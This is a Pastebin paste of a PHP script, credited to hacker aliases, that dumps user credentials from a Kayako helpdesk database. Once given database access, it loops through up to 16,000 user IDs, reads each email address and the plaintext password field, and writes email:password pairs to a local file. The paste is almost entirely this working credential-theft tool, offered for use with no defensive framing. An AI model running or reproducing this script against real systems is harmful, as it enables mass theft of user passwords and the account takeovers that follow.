Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- //Kayako plain text PWD dumper
- //Coded By Karar & i-Hmx
- //sec4ever.com , 1337s.cc , alm3refh.com
- //some pastes > http://pastebin.com/u/i-Hmx
- // Database info
- $host='localhost'; // Host
- $user='username'; // username
- $pass='password'; // password
- $db='database'; // database name
- $num="16000"; // number of users to be dumped
- $file="faris.sub"; // file where Data will Be dumped
- //
- #############!!!Game start!!!#############
- //
- mysql_connect($host,$user,$pass) or die(mysql_error());
- mysql_select_db($db);
- $f = fopen($file, 'w+');
- for($faris=1;$faris<$num;$faris++)
- {
- $fa = mysql_query("SELECT * FROM swuseremails where userid=".$faris."") or die(mysql_error());
- while ($email = mysql_fetch_array($fa)){
- $mail=$email["email"];
- echo "$mail";
- fwrite($f,"".$mail.":");
- }
- $sql = mysql_query("SELECT * FROM swusers where userid=".$faris."") or die(mysql_error());
- while ($pwd = mysql_fetch_array($sql)){
- $password=$pwd["userpasswordtxt"];
- echo ":$password\n";
- fwrite($f,"".$password."\n");
- }
- }
- echo "\n| data was dumped successfully > $file\n";
- echo "| Kayako Plain text dumper<br>";
- echo "| Coded By HaCKeR-MaN<br>";
- echo "| faris_romantic2000@yahoo.com<br>";
- echo "| sec4ever.com - 1337r1z.wordpress.com<br>";
- echo "./faris";
- # EOF
- ?>
Add Comment
Please, Sign In to add comment